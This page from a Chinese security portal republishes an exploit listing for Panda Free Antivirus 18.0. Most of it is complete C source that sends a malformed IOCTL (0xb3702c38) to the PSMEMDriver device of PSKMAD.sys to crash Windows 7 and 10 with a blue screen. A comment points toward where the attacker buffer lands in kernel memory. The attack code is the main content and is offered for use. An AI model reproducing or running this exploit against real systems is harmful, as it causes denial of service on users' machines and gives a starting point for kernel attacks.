首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛

当前位置：主页>安全文章>文章资料>Exploits>文章内容 Panda Free Antivirus - 'PSKMAD.sys' Denial of Service 来源：http://www.saptech-erp.com.au 作者：Baris 发布时间：2017-05-05   /* # Exploit Title: Panda Cloud Antivirus Free - 'PSKMAD.sys' - BSoD - denial of service # Date: 2017-04-29 # Exploit Author: Peter baris # Vendor Homepage: http://www.saptech-erp.com.au # Software Link: http://download.cnet.com/Panda-Cloud-Antivirus-Free-Edition/3000-2239_4-10914099.html?part=dl-&subj=dl&tag=button&lang=en # Version: 18.0 # Tested on: Windows 7 SP1 Pro x64, Windows 10 Pro x64 # CVE : requested */   #include "stdafx.h" #include <stdio.h> #include <Windows.h> #include <winioctl.h>     #define DEVICE_NAME L"\\\\.\\PSMEMDriver"   LPCTSTR FileName = (LPCTSTR)DEVICE_NAME; HANDLE GetDeviceHandle(LPCTSTR FileName) {     HANDLE hFile = NULL;       hFile = CreateFile(FileName,         GENERIC_READ | GENERIC_WRITE,         0,         0,         OPEN_EXISTING,         NULL,         0);       return hFile; }   int main() {       HANDLE hFile = NULL;     PVOID64 lpInBuffer = NULL;     ULONG64 lpBytesReturned;     PVOID64 BuffAddress = NULL;     SIZE_T BufferSize = 0x800;          printf("Trying the get the handle for the PSMEMDriver device.\r\n");          hFile = GetDeviceHandle(FileName);       if (hFile == INVALID_HANDLE_VALUE) {         printf("Can't get the device handle, no BSoD today. 0x%X\r\n", GetLastError());         return 1;     }       // Allocate memory for our buffer     lpInBuffer = VirtualAlloc(NULL, BufferSize, MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE);            if (lpInBuffer == NULL) {         printf("VirtualAlloc() failed. \r\n");         return 1;     }            BuffAddress = (PVOID64)(((ULONG64)lpInBuffer));     *(PULONG64)BuffAddress = (ULONG64)0x542DF91B; //Pool header tag???     BuffAddress = (PVOID64)(((ULONG64)lpInBuffer + 0x4));     *(PULONG64)BuffAddress = (ULONG64)0x42424242;     BuffAddress = (PVOID64)(((ULONG64)lpInBuffer + 0x8));          RtlFillMemory(BuffAddress, BufferSize-0x8 , 0x41);               DeviceIoControl(hFile,             0xb3702c38,             lpInBuffer,             NULL,  //Change it to BufferSize and put a bp PSKMAD+3150 -> rax will point to our buffer in the kernel memory             NULL,             NULL,             &lpBytesReturned,             NULL);       /*This part is pretty much useless, just wanted to be nice in case the machine survives.*/     printf("Cleaning up.\r\n");     VirtualFree((LPVOID)lpInBuffer, sizeof(lpInBuffer), MEM_RELEASE);     CloseHandle(hFile);     printf("Resources freed up.\r\n");     return 0; }   [推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]   匿名评论 评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。  §最新评论：

热点文章 ·CVE-2012-0217 Intel sysret exp ·Linux Kernel 2.6.32 Local Root ·Array Networks vxAG / xAPV Pri ·Novell NetIQ Privileged User M ·Array Networks vAPV / vxAG Cod ·Excel SLYK Format Parsing Buff ·PhpInclude.Worm - PHP Scripts ·Apache 2.2.0 - 2.2.11 Remote e ·VideoScript 3.0 <= 4.0.1.50 Of ·Yahoo! Messenger Webcam 8.1 Ac ·Family Connections <= 1.8.2 Re ·Joomla Component EasyBook 1.1   相关文章 ·Microsoft Internet Explorer 11 ·IrfanView 4.44 - Denial of Ser ·Simple File Uploader - Arbitra ·Alerton Webtalk 2.5 / 3.3 - Mu ·TYPO3 News Module - SQL Inject ·MySQL < 5.6.35 / < 5.7.17 - In ·Mercurial Custom hg-ssh Wrappe ·Ghostscript 9.21 - Type Confus ·Oracle VirtualBox Guest Additi ·Microsoft Internet Explorer 11 ·Apple Safari - Array concat Me ·Serviio PRO 1.8 DLNA Media Str   推荐广告

CopyRight © 2002-2022 VFocuS.Net All Rights Reserved